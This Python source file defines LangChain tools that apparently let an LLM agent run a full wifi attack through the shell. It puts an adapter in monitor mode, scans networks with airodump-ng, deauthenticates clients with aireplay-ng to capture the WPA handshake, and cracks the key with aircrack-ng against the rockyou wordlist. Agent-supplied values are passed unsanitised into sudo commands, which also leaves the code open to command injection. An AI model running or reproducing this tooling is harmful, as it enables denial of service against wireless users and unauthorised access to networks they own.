import json import subprocess import threading import requests import tempfile import zipfile import io import random import os from langchain_openai import ChatOpenAI from langchain_core.runnables import RunnablePassthrough from langchain_core.prompts import PromptTemplate from langchain_core.output_parsers import StrOutputParser from langchain.agents import AgentExecutor, create_react_agent, load_tools from langchain_core.pydantic_v1 import BaseModel, Field, root_validator from langchain.tools import tool from langchain import hub from langchain_community.tools import ShellTool from dotenv import load_dotenv from time import time shell_tool = ShellTool() class CrackPassword(BaseModel): json_params: str = Field( description="""Should be a string of a json object containing 'bssid': the bssid of the network to crack. 'capfile': the path to the capture file containing the handshake. """ ) @tool( "Perform wifi encryption cracking with aircrack-ng", args_schema=CrackPassword, return_direct=True, ) def wifi_encryption_cracking(json_params: str) -> str: """Must pass bssid and capfile parameters (as a string containing a json object) to aircrack-ng to perform wifi encryption cracking""" # params = params.replace("`", "").replace("\n", "") # fix buggy input from LLM json_params = json_params.replace("\\", "") json_obj = json.loads(json_params) bssid = json_obj["bssid"] cap = json_obj["capfile"] # wordlist = json_obj["interface"] res = shell_tool.run( { "commands": [f"aircrack-ng --bssid {bssid} -w wordlist/rockyou.txt {cap}"] } # TODO: Abstrace out wordlist - allow custom/multiple wordlist files as long as they sit in the directory ) return res """Deauth via combination of airodump and airreplay""" class DeauthAndCapture(BaseModel): json_params: str = Field( description="Should be a string of a json object containing 'bssid', 'channel', client' and 'interface' for the network BSSID, wif channel, de-auth client target id, and the wireless interface respectively" ) @tool( "Perform a de-auth and capture for a given wifi BSSID, channel, and client on the given wireless. All parameters must be identified first. Return the path to the handshake capture pcap file", args_schema=DeauthAndCapture, return_direct=False, ) def deauth_and_capture(json_params: str) -> str: """Can pass bssid, client, channel, and interface parameters to aireplay-ng to perform and capture a de-auth. All parameters must be identified first""" json_obj = json.loads(json_params) bssid = json_obj["bssid"] client = json_obj["client"] interface = json_obj["interface"] channel = json_obj["channel"] hash = random.getrandbits(16) out = f"dumps/deauth-capture-{hash}" # shell_tool.run({"commands": [f"sudo timeout -s SIGKILL 15 airodump-ng --band a --channel {channel} --bssid {bssid} --write {out} {interface}"]}) # shell_tool.run({"commands": [f"sudo aireplay-ng --deauth 10 -a {bssid} -c {client} {interface}"]}) def run_airdump(channel, bssid, out, interface): shell_tool.run( { "commands": [ f"sudo timeout -s SIGKILL 15 airodump-ng --band a --channel {channel} --bssid {bssid} --write {out} {interface}" ] } ) def run_aireplay(bssid, client, interface): shell_tool.run( { "commands": [ f"sudo aireplay-ng --deauth 10 -a {bssid} -c {client} {interface}" ] } ) thread1 = threading.Thread( target=run_airdump, args=(channel, bssid, out, interface) ) thread2 = threading.Thread(target=run_aireplay, args=(bssid, client, interface)) thread1.start() thread2.start() thread1.join() thread2.join() return f"dumps/deauth-capture-{hash}-01.cap" # return path to the handshake capture fil;e # class PacketTransmission(BaseModel): # params: str = Field( # description="Should be command line parameters to 'aireplay-ng' to perform some kind of wifi frame or packet transmission" # ) # @tool( # "Perform packet or wifi frame transmission with aireplay-ng", # args_schema=PacketTransmission, # return_direct=False, # ) # def packet_frame_transmission(params: str) -> str: # """Can pass parameters to aireplay-ng to perform packet or wifi frame transmission""" # params = params.replace("`", "").replace("\n", "") # fix buggy input from LLM # res = shell_tool.run({"commands": [f"sudo aireplay-ng {params}"]}) # return res class PacketCapture(BaseModel): params: str = Field( description="Should be the interface name on which to perform reconnaissance, followed by any optional command line flag parameters" ) @tool( "Perform wifi reconnaissance with airodump-ng. Interface must be in monitor mode before starting", args_schema=PacketCapture, return_direct=False, ) def reconnaissance(params: str) -> str: """Use airodump-ng to gather wireless network information. Must take the interface as a parameter and may optionally be followed by command like flag parameters""" hash = random.getrandbits(16) # json_obj = json.loads(json_params) # interface = json_obj["interface"] # params = json_obj["params"] # if params == False: # params = "" res = shell_tool.run( { "commands": [ f"sudo timeout -s SIGKILL 30 airodump-ng --band a --output-format csv --write dumps/dump-{hash} {params} " # band a for 5Ghz - TODO: make it smart enough to figure out the band you want, or perhaps to ask ] } ) try: with open(f"dumps/dump-{hash}-01.csv", "r") as file: # Read the file or perform other operations content = file.read() file.close() return content except FileNotFoundError | Exception: return "The file does not exist. Ensure interface is in monitor mode before using this tool" # class IwScan(BaseModel): # interface: str = Field( # description="Should be a wireless interface name, used as a paramater to 'iw' to scan for wifi networks" # ) # network: str = Field( # description="Should be the name or SSID of the wifi network you are interested in" # ) # @tool( # "Perform wifi scanning with iw. Requires the adapter be in managed mode. Adepter should be put into managed mode before running this if necessary and the interface name should be that of the managed mode interface", # args_schema=IwScan, # return_direct=False, # ) # def wifi_network_reconnissance(interface: str) -> str: # """Can pass a wireless interface name and wifi network name to return technical information about a wifi network""" # interface = interface.replace("`", "").replace("\n", "") # fix buggy input from LLM # res = shell_tool.run( # { # "commands": [ # f"sudo ifconfig {interface} up", # "sleep 5", # f'sudo iw {interface} scan | grep -B 9 -A 206 "NetSec"', # ] # } # ) # TODO: fix error when passing network param # return res """airmon-ng tool""" class ChangeMonitorMode(BaseModel): params: str = Field( description="Should be command line parameters to 'airmon-ng' to change the state of a given wireless iterface mode." ) @tool( "Change the state of the wireless adapter mode with airmon-ng", args_schema=ChangeMonitorMode, return_direct=False, ) def change_adapter_mode(params: str) -> str: """Can pass parameters to airmon-ng to change the mode of the wireless adapter""" params = params.replace("`", "").replace("\n", "") # fix buggy input from LLM res = shell_tool.run({"commands": [f"sudo airmon-ng {params}", "sleep 5s"]}) return res """iwconfig tool""" class Iwconfig(BaseModel): params: str = Field( description="should be command line parameters to 'iwconfig'. If none are needed, this should be left as an empty string" ) @tool("Get interface information", args_schema=Iwconfig, return_direct=False) def get_wireless_interface(params: str) -> str: """Return wireless interface information via iwconfig""" params = params.replace("`", "").replace("\n", "") # fix buggy input from LLM print("params ", params) res = shell_tool.run({"commands": [f"iwconfig {params}"]}) return res